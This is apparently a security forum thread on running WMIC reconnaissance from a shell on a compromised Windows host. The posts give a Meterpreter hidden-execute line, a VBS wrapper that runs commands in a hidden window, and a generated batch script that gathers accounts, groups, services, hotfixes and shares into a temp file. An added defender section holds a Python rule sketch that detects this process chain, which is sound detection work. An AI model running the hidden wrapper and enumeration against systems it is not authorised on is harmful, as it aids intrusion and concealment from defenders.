
Thread: Running WMIC in Command Shell

  1. #1 Running WMIC in Command Shell

    WMIC is one of those Windows commands that you just love due to its flexibility, but sadly when you have a shell you are not able to run it because it breaks the shell, losing possibly hours of work to achieve the shell, and by running the attack again one might bring down the target server. I found that the best way to run WMIC is with Metasploit Meterpreter by executing the command in the following way in Meterpreter:
    Code:
    execute -H -f wmic.exe  "/append:c:\windows\temp\34des34.txt process get name,processid,commandline"
    You must make sure that the command is run as hidden with the "-H" option and that you do not use the "-i" and "-c" options, since using these options will break the shell. To get the output of our commands we make sure that we use "/append:" so we can collect the output of our commands into a single text file that we can later open from within Meterpreter or download.

    When not using Meterpreter and running from a simple command shell like one from netcat, I used in the past to use SC to create a service that would execute a script with all of my wmic commands, or use schtasks or at to schedule the command and then collect the output, but this proved to be very time consuming and prone to error. So I changed my approach and started using WSH scripting to execute wmic for me. It works in the following manner: I first create a VB script for executing my wmic commands; it can even be used to execute Powershell!!!
    Code:
    echo CreateObject("Wscript.Shell").Run Wscript.Arguments(0), 0, False > execcmd.vbs
    then we can execute our wmic command in the following manner:
    Code:
    cscript //nologo execcmd.vbs "wmic /append:c:\windows\temp\34des34.txt process get name,processid,commandline"
    we can get the output by running:
    Code:
    type c:\windows\temp\34des34.txt

    we can even script out an entire enumeration by doing something like this:
    Code:
    echo wmic /append:c:\windows\temp\34des34.txt computersystem list >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt useraccount list >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt group list >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt service list brief >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt volume list brief >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt process list brief >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt startup list full >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt rdtoggle list >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt qfe >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logicaldisk get description,filesystem,name,size >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logicaldisk get description,name,freespace,size >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt volume get label,freespace,filesystem,capacity,driveletter >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netlogin get name,lastlogon >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netlogin get name,badpasswordcount >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt desktop get screensaversecure,screensavertimeout >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logon get authenticationpackage >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netclient get name >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netuse get name,username,connectiontype,localname >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt nteventlog get path,filename,writeable >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt os get name,servicepackmajorversion >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt service get name,startmode,state,status >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt product get name,version >> c:\windows\temp\sdcx.cmd
    once the script is generated we execute the script by running:
    Code:
    cscript //nologo execcmd.vbs "cmd /c c:\windows\temp\sdcx.cmd"

  2. #2

    A better formatted script generation that will make the output much easier to read and find relevant info:
    Code:
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Computer Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt computersystem list >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Account Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt useraccount list >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             User Group Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt group list >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Services Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt service list brief >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Volume Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt volume list brief >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Running Processes Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt process list brief >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             System Startup Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt startup list full >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Terminal Services Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt rdtoggle list >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Hotfix Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt qfe >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Logical Disk Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logicaldisk get description,filesystem,name,size >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logicaldisk get description,name,freespace,size >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Netlogin Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netlogin get name,lastlogon >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netlogin get name,badpasswordcount >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Screen Saver Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt desktop get screensaversecure,screensavertimeout >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo         Authentication Methods Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logon get authenticationpackage >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Network Services Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netclient get name >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             Connected Share Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netuse get name,username,connectiontype,localname >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo         Eventlog Configuration Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt nteventlog get path,filename,writeable >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo             OS Version and SP Information ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt os get name,servicepackmajorversion >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo         Programs Installed from an msi ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** ^>^> c:\windows\temp\34des34.txt >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt product get name,version >> c:\windows\temp\sdcx.cmd
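Seen from the defender's side, both posts describe the same process chain: a script host (cscript.exe running the one-line execcmd.vbs wrapper) launches wmic.exe with its output redirected into a temp file via /append:, and later cmd /c runs a batch file dropped in the same temp directory. Those parent/child and command-line details are exactly what endpoint process-creation logging records, even though the hidden window (the 0 passed to .Run) is invisible in the logs. The following is an added example, not code from this thread: it runs a few rules over constructed process-creation events written in a simplified Sysmon Event ID 1 style. The field names Image, CommandLine and ParentImage, the key=value line format and the sample events themselves are assumptions made for the example; a real collector may name the fields differently.

```python
"""Detection sketch for the pattern described in this thread: a Windows Script
Host process (cscript/wscript) launching wmic.exe, wmic writing its output to
a temp file via /append: or /output:, and a batch file in a temp directory
being run through cmd /c from a script host.

Added example, not code from the thread. The log lines are constructed for
this example in a simplified Sysmon Event ID 1 (process creation) style; the
field names Image, CommandLine and ParentImage are assumed.
"""
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")
# Directories the thread writes into; lower-cased, matched as substrings.
TEMP_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\")

# Constructed sample: one process-creation event per line; quoted values may
# contain \" escapes (the cscript line carries the wmic command as an argument).
SAMPLE_LOG = r'''
Image=C:\Windows\System32\cscript.exe CommandLine="cscript //nologo execcmd.vbs \"wmic /append:c:\windows\temp\34des34.txt process get name,processid,commandline\"" ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\System32\wbem\WMIC.exe CommandLine="wmic /append:c:\windows\temp\34des34.txt process get name,processid,commandline" ParentImage=C:\Windows\System32\cscript.exe
Image=C:\Windows\System32\wbem\WMIC.exe CommandLine="wmic os get caption" ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\System32\cmd.exe CommandLine="cmd /c c:\windows\temp\sdcx.cmd" ParentImage=C:\Windows\System32\cscript.exe
Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe" ParentImage=C:\Windows\explorer.exe
'''

# key=value where the value is either "quoted, with \" escapes" or a bare token.
KV = re.compile(r'(\w+)=(?:"((?:[^"\\]|\\.)*)"|(\S+))')


def parse_line(line: str) -> Dict[str, str]:
    """Parse one key=value event line into a dict, unescaping \\" in quoted values."""
    fields: Dict[str, str] = {}
    for m in KV.finditer(line):
        raw = m.group(2) if m.group(2) is not None else m.group(3)
        fields[m.group(1)] = raw.replace('\\"', '"')
    return fields


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def in_temp(cmd: str) -> bool:
    """True if the (lower-cased) command line references a known temp directory."""
    return any(d in cmd for d in TEMP_DIRS)


def evaluate(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches; an empty list is benign."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    hits: List[str] = []
    # A script host handed a wmic command string (the execcmd.vbs wrapper).
    if image in SCRIPT_HOSTS and "wmic " in cmd:
        hits.append("script_host_wrapping_wmic")
    # wmic.exe whose parent is cscript/wscript rather than a console shell.
    if image == "wmic.exe" and parent in SCRIPT_HOSTS:
        hits.append("wmic_spawned_by_script_host")
    # wmic told to write its output into a temp directory (/append: or /output:).
    if image == "wmic.exe" and ("/append:" in cmd or "/output:" in cmd) and in_temp(cmd):
        hits.append("wmic_output_redirected_to_temp")
    # cmd /c running a .cmd/.bat from a temp directory, launched by a script host.
    if (image == "cmd.exe" and parent in SCRIPT_HOSTS and "/c" in cmd
            and in_temp(cmd) and (".cmd" in cmd or ".bat" in cmd)):
        hits.append("batch_in_temp_via_script_host")
    return hits


def scan(log_text: str) -> List[Tuple[str, List[str]]]:
    """Run every rule over each non-empty line; return (image, hits) for matches only."""
    findings: List[Tuple[str, List[str]]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        hits = evaluate(ev)
        if hits:
            findings.append((basename(ev.get("Image", "")), hits))
    return findings


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_LOG):
        print(f"{image}: {', '.join(hits)}")
```

Run as a script it reports three of the five sample events: the cscript wrapper call, the wmic.exe child that writes to the temp file, and the cmd /c launch of the temp batch file; the plain "wmic os get caption" from a console and the notepad launch are left alone. The rules key on the parent/child relationship and the output redirection rather than on wmic.exe alone, because wmic is common in legitimate administration and alerting on every invocation would be noisy.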
